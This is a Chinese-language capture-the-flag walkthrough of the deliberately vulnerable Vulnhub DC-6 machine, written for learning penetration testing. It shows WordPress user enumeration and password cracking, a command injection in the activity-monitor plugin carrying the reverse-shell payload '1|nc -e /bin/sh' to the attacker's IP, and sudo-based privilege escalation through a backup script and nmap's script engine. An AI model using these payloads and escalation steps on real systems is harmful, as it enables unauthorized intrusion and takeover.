Vulnhub靶机入门系列DC:6

DC-6

题目描述

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This isn't an overly difficult challenge so should be great for beginners.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:
192.168.0.142 wordy

Clue
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

描述中说到和之前一样只有一个Flag,并且需要配置一下HOSTS,且给了提示

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

知识点总结

​ ①扫描

​ ②使用wpscan工具枚举用户,结合提示生成字典进行爆破密码

​ ③利用网站插件的命令执行漏洞反弹shell

​ ④根据每个用户可以执行的操作进行提权

​ ⑤nmap提权

1.扫描局域网主机

arp-scan -l
image

目标IP为:192.168.2.132

2.扫描端口

nmap -sV -p- 192.168.2.132

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))

可以看到开放了ssh端口和web端口

3.配置hosts

题目描述已经说了,我们需要配置一下hosts文件

Windows下在 C:\windows\system32\drivers\etc\hosts

打开后在末尾添加

192.168.2.132  wordy

Linux下在/etc/hosts

vim /etc/hosts
添加  192.168.2.132  wordy

4.访问web

image
image

是一个WordPress网站,kali有专门的扫描工具wpscan,我们可以使用工具扫描一下

在扫描之前先来扫一下目录

5.使用dirsearch扫描目录

image

发现的登录地址

6.使用wpscan扫描用户

wpscan --url http://wordy/  -e u
image

发现了这几个用户,我们将用户保存到dc6-username.txt中

admin,mark,graham,sarah,jens
image

7.对用户密码进行爆破

我们使用cewl来生成字典

cewl -w /root/dc6-passwd.txt http://wordy/

开始爆破

wpscan --url http://wordy/ -U dc6-username.txt -P dc6-passwd.txt
image

但是这里显示没有找到密码,于是我们想到刚开始的时候提示有密码

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

将rockyou.txt里面的带有k01的面找出来

我们先查看一下rockyou.txt

image

这里确实有这个字典,将带有k01的密码导出来

image

然后进行爆破

wpscan --url http://wordy/ -U dc6-username.txt -P dc6-passwd.txt
image

找到了mark的密码为:helpdesk01

登录后台发现有一个插件

image

也可以通过wpscan扫描插件

wpscan --url http://wordy --plugins-detection aggressive
image

8.利用插件漏洞来getshell

首先百度查一下activity-monitor漏洞

image

可以看到有命令执行漏洞

我们用kali的searchsploit来查找漏洞

searchsploit activity monitor 
image
#将html文件复制到root目录
cp /usr/share/exploitdb/exploits/php/webapps/45274.html  45274.html
#拷贝一份
cp 45274.html 45274.html.bak
#修改一下html内容,将反弹ip改成kali的,提交申请改为目标网站
vi 45274.html
image

然后直接打开网页提交,这里不知道为什么获取不到shell,研究一下exp然后去网页上自己实现

这里是在activity的插件页面的tools分类里边

image

填IP的地方有个命令执行,我们测试一下

image

(这里因为填IP的地方对长度有限制所以前边的127.0.0.1删掉了一部分)

image

可以看到whoami的命令已经被执行,我们在这里反弹一个shell,但是我们的shell长度有点长,使用F12修改输入的长度


image

然后在kali上监听

#kali
nc -lvp 1234
#发送payload
1|nc -e /bin/sh 192.168.2.135 1234

可以看到已经获取shell了

image

同样,切换一下shell外壳

python -c 'import pty;pty.spawn("/bin/bash")'
image

先看看这里都有什么文件,进入到home目录下当前用户的文件夹

image

发现一个txt

image

发现了graham的密码

graham - GSo7isUM1D4

切换到这个用户

image

先查看一下有没有suid提权 发现没有 再使用sudo -l看一下可以执行的命令

image

可以使用jens用户来执行这个.sh文件
查看一下这个脚本是什么内容

image

既然我们可以执行这个脚本,我们把/bin/bash放入脚本里,以jens用户执行后 就相当于获取了jens的权限

echo "/bin/bash" >> backups.sh
image

已经写进去了

然后以jens用户执行

sudo -u jens ./backups.sh
image

已经切换到jens用户

再使用sudo -l 查看一下可以执行的操作

image

可以使用nmap,由于nmap是可以执行脚本的,我们把root的shell放入脚本里让nmap执行也就相当于获取了root的权限

#写入shell
echo 'os.execute("/bin/sh")' > Shell
#name使用script执行脚本
sudo  nmap  --script=shell
image

获取root权限,查看flag

image
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 143,396评论 1 301
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 61,482评论 1 258
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 94,858评论 0 213
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 41,131评论 0 179
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 48,903评论 1 256
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 38,847评论 1 177
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 30,454评论 2 273
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 29,206评论 0 167
  • 想象着我的养父在大火中拼命挣扎,窒息,最后皮肤化为焦炭。我心中就已经是抑制不住地欢快,这就叫做以其人之道,还治其人...
    爱写小说的胖达阅读 29,047评论 6 232
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 32,563评论 0 213
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 29,344评论 2 215
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 30,667评论 1 231
  • 白月光回国,霸总把我这个替身辞退。还一脸阴沉的警告我。[不要出现在思思面前, 不然我有一百种方法让你生不如死。]我...
    爱写小说的胖达阅读 24,264评论 0 32
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 27,163评论 2 214
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 31,546评论 3 207
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 25,630评论 0 9
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,032评论 0 166
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 33,572评论 2 231
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 33,668评论 2 232

推荐阅读更多精彩内容